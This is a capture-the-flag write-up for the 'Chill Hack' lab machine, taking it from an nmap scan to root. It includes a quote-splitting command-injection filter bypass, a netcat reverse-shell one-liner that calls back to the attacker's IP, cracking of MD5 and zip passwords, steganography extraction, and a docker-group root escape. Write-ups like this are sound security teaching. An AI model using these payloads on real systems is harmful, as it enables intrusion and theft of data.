# Chill Hack
## Tasks
* user flag
* root flag
## Vulnerabilities
* Unnecessary privileges
* FTP allowing Anonymous (Even though nothing was in there except a note)
* Weak password and hash
* Filtering not good enough.

## NMAP
```nmap
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.1.163
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
FTP is open with Anonymous login for some reason. 
```bash
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt

```
```txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
```
Apparently there is some filtering somewhere. Let's check out our Gobuster results.

## Enumeration
### Gobuster
```bash
/.hta.html            (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd.js         (Status: 403) [Size: 276]
/.hta.js              (Status: 403) [Size: 276]
/.htaccess.txt        (Status: 403) [Size: 276]
/.htpasswd.txt        (Status: 403) [Size: 276]
/.hta                 (Status: 403) [Size: 276]
/.htaccess.php        (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.hta.txt             (Status: 403) [Size: 276]
/.htaccess.html       (Status: 403) [Size: 276]
/.htpasswd.php        (Status: 403) [Size: 276]
/.hta.php             (Status: 403) [Size: 276]
/.htaccess.js         (Status: 403) [Size: 276]
/.htpasswd.html       (Status: 403) [Size: 276]
/about.html           (Status: 200) [Size: 21339]
/blog.html            (Status: 200) [Size: 30279]
/contact.html         (Status: 200) [Size: 18301]
/contact.php          (Status: 200) [Size: 0]    
/css                  (Status: 301) [Size: 308] [--> http://10.10.69.53/css/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.69.53/fonts/]
/index.html           (Status: 200) [Size: 35184]                              
/images               (Status: 301) [Size: 311] [--> http://10.10.69.53/images/]
/index.html           (Status: 200) [Size: 35184]                               
/js                   (Status: 301) [Size: 307] [--> http://10.10.69.53/js/]    
/news.html            (Status: 200) [Size: 19718]                               
/secret               (Status: 301) [Size: 311] [--> http://10.10.69.53/secret/]
/server-status        (Status: 403) [Size: 276]                                 
/team.html            (Status: 200) [Size: 19868]   
```
Immediately /secret/ is an attention to us.
Heading over to there, it seems like it accept's a command but there is some filtering happening.
Let's check out PayloadsAllTheThings for something about Command Injection
I'll be using Burpsuite to view my response
After a lot of trying around, I used the bypass with double quotes
```txt
w"h"o"am"i
```
Let's try and cat out /etc/passwd
```txt
commandc"a"t /etc/passwd
```
```html
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
apaar:x:1001:1001:,,,:/home/apaar:/bin/bash
anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
```
Look's like that works. Let's try a reverse shell.
After trying a lot of shells, bash,python and netcat doesn't work. But what does work was Netcat OpenBSD.
```txt
r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.1.163 4444 >/tmp/f
```
Let's stabilize our shell first.
Now we need to find something to escalate our privileges.

## Privesc
Let's check out if www-data can run sudo -l
```bash
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
```
Weird it's not suppose to be able to use sudo.

Let's check out apaar's home. There seems to be a local.txt which is probably our flag.
Let's check out the permission of .helpline.sh
```bash
-rwxrwxr-x 1 apaar apaar  286 Oct  4  2020 .helpline.sh

```
Sadly we can only read it and execute. Let's check the source code.
```bash
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"

```
That's weird, the variable of msg is not being echo'ed out but execute it to 2>/dev/null
Maybe we can get a shell as different user since we can use sudo on it.
```bash
www-data@ubuntu:/home/apaar$ sudo -u apaar ./.helpline.sh 

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: ok  
Hello user! I am ok,  Please enter your message: /bin/bash
whoami
apaar

```
You might think the program is broken but it's not, if you type out whoami, you will get the user apaar. Sweet, now let's get that user flag.
Now let's enumerate more of the machine using linpeas.sh
```txt
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9001          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -  
```
Apparently there is an SQL server running and something on port 9001
Let's create a SSH key and put it in authorized keys. For this, create a ssh key and put the public key in authorized_keys inside .ssh. Next let's SSH in using port forwarding.
```bash
┌─[faris@parrot-hp]─[~/.ssh]
└──╼ $ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@10.10.6

```

Sweet, now we can check out 127.0.0.1:9001. 
It seems to be a login page to a website. Let's find credentials inside /var/www/
There seems to be something inside index.php
```php
<html>
<body>
<?php
	if(isset($_POST['submit']))
	{
		$username = $_POST['username'];
		$password = $_POST['password'];
		ob_start();
		session_start();
		try
		{
			$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
			$con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING);
		}
		catch(PDOException $e)
		{
			exit("Connection failed ". $e->getMessage());
		}
		require_once("account.php");
		$account = new Account($con);
		$success = $account->login($username,$password);
		if($success)
		{
			header("Location: hacker.php");
		}
	}
?>
<link rel="stylesheet" type="text/css" href="style.css">
	<div class="signInContainer">
		<div class="column">
			<div class="header">
				<h2 style="color:blue;">Customer Portal</h2>
				<h3 style="color:green;">Log In<h3>
			</div>
			<form method="POST">
				<?php echo $success?>
                		<input type="text" name="username" id="username" placeholder="Username" required>
				<input type="password" name="password" id="password" placeholder="Password" required>
				<input type="submit" name="submit" value="Submit">
        		</form>
		</div>
	</div>
</body>
</html>

```
Let's get that out
```txt
root:!@m+her00+@db
```
Looks like it's saying I'm root at db?
Let's login using the credentials using mysql.
```bash
mysql -u root -p
Password:
```
Success! Now let's dump the tables.
```sql
mysql> select * from users
    -> ;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+
```
Ah, it's hashed. No worries, let's crack it. Checking the hash using identifier it seems to be MD5. Let's crack it using hashcat. Less that a minute they were cracked.
```text
7e53614ced3640d5de23f111806cc4fd:masterpassword
686216240e5af30df0501e53c789a649:dontaskdonttell
```
We can login using both, and we'll be greeted with a picture. Since I remembered it mentioned steg, so it must be something hidden in this picture.
```bash
steghide info something.jpg 
"something.jpg":
  format: jpeg
  capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "backup.zip":
    size: 750.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
```
Checking out the file without a password, it sure is!
Let's extract it out.
```bash
steghide extract -sf something.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".
```
Looks like the zip is password protected, we can use zip2john for this.
```bash
zip2john backup.zip > zip.hash
```
Now let's crack it with john.
```bash
john --show zip.hash 
backup.zip/source_code.php:pass1word:source_code.php:backup.zip::backup.zip
```
What a weak password.
Let's open it up.
And it reveals a source_code for php file. Let's check it out.
Fortunately, the programmer isn't very security oriented person.
```php
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
```
Let's decode it.
```bash
echo IWQwbnRLbjB3bVlwQHNzdzByZA== | base64 -d
!d0ntKn0wmYp@ssw0rd
```
Looks like it's the password of Anurodh. Let's try to change to that user.
```bash
apaar@ubuntu:/var/www/files$ su anurodh
Password: 
anurodh@ubuntu:/var/www/files$ 
```
Success!
But what now, we can't run sudo on anything except .helpline.sh
and linpeas.sh reveals no SUIDs or crontabs. Let's check out our groups
```bash
anurodh@ubuntu:/var/www/files$ groups
anurodh docker
```
Ooo, we're in the docker group. Let's check out GTFObins
```txt
It can be used to break out from restricted environments by spawning an interactive system shell.

-   The resulting is a root shell.
    
    docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
Let's try the first one out.
```bash
anurodh@ubuntu:/var/www/files$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
```
That was easy! Now let's grab that root flag!



